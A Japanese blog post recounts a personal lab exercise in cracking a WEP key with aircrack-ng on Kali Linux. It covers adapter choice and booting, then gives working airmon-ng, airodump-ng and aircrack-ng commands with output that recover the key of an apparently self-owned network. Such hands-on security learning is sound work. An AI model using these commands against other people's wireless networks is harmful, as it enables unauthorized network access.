無線lanのクラックaircrack-ng

目的

メジャーなWEPキーのクラックを体験してみる。

環境

PC:lenovo X230
OS:kali linux
other:TL-WN722N (USB無線lan子機)

その他の情報

今回使用するaircrack-ngは無線lanとのチップセットの相性が重要になる。
具体的にはモニターモードをサポートしているatherosのチップセットでないといけない。

筆者のX230はintelだったのでUSB無線lan子機を探す。
すぐに親切な外人がまとめてくれたサイトが出てくる。

https://www.raymond.cc/blog/best-compatible-usb-wireless-adapter-for-backtrack-5-and-aircrack-ng/2/

調べた結果、値段やサイズ、本検証における信頼性において、バランスが良いと判断したTL-WN722Nを購入する。

はまったのは、virtual box on kaliにUSB無線lan子機(TL-WN722N)を直接認識させること。

正確には認識はするのだけれども、wifiアダプターとして認識されない・・
やれどもやれども、virtual box上のkaliがwifiの表示をしない。

結局Live USBでkaliを起動して検証。
目的はWEPキーのクラックなので・・w

手順

kaliをUSBブートさせる。
(余談だが、USBメモリが無かったので、SDカードを使用した。
通常、X230はSDブートできない。家に落ちていたUSBカードリーダー差したら
USBカードリーダーはbootできるみたいだったので、そのままSDカードでやってみたらできた。)

起動したらまずはNWインターフェースの確認

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.167.1.76  netmask 255.255.0.0  broadcast 10.167.255.255
        inet6 fe80::9c1e:cf23:ab73:a3a4  prefixlen 64  scopeid 0x20<link>
        ether 3c:97:0e:xx:xx:xx  txqueuelen 1000  (Ethernet)
        RX packets 9740  bytes 10016203 (9.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6791  bytes 717372 (700.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 20  memory 0xf2500000-f2520000  

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 20  bytes 1032 (1.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20  bytes 1032 (1.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 1e:d2:69:xx:xx:xx  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.8  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::20a3:baf0:9aed:e15f  prefixlen 64  scopeid 0x20<link>
        ether 98:de:d0:xx:xx:xx  txqueuelen 1000  (Ethernet)
        RX packets 138  bytes 44500 (43.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 2416 (2.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

この場合、eth0が有線、wlan0が内臓の無線lan、wlan1がUSB無線lan子機。
virtual boxでは、このwlanの4文字が遠かった・・

次は、wlan1を停止して、モニターモードに変更

root@kali:~# airmon-ng stop wlan1

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] (rev 34)
phy1	wlan1		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n


root@kali:~# airmon-ng start wlan1

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 1059 NetworkManager
 1222 wpa_supplicant
 1230 dhclient
 1957 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] (rev 34)
phy1	wlan1		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n

    (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
    (mac80211 station mode vif disabled for [phy1]wlan1)

変更後の無線lanの状態を確認

root@kali:~# iwconfig
wlan1mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

wlan1がwlan1monに変わっている。
モニターモードに変化したのだ。これが、atherosチップセットの恩恵である。

モニターモードとして周辺の無線lanを検索する。

root@kali:~# airodump-ng wlan1mon

今回はESSID”N-lab”がターゲット。

次のコマンドでターゲットからの情報を収集する

root@kali:~# airodump-ng --channel 1 --bssid F4:CB:52:xx:xx:xx -w test wlan1mon

–channelはCH、
–bssidはBSSID
testは保存するファイル名だ。

実行すると下図左側となり、ファイルをダンプしだす。
保存されたファイルを別のターミナルで開き、以下のコマンドを実行

root@kali:~# aircrack-ng test-01.cap

実行すると、下図右側となり、自動で解析してくれる。
(元々のターミナルは停止しなくてもできた。)

赤枠の”test5″がWEPキーだ。

通信が出ていないと、解析できず無理矢理通信させる方法等、色々あるようです。
今回は他の端末を接続させていたのか、上手く行きました。

検証事態はすぐにできたけど、環境を整えるのに時間がかかった。
virtual boxに拘りすぎた。臨機応変にいかないと!

1件のコメント

  1. 初めまして!セキュリティに興味が湧き独学中の学生です。Atheros AR9271と検索していた際、あなたのサイトを見つけました。ど素人の私にも理解しやすい内容でとても感謝しています。これからもぜひ勉強させていただきたいのでそれぞれ専門用語も一言でいいので説明を加えてもらえるとなお助かります。これからも投稿を応援しています。

ただいまコメントは受け付けていません。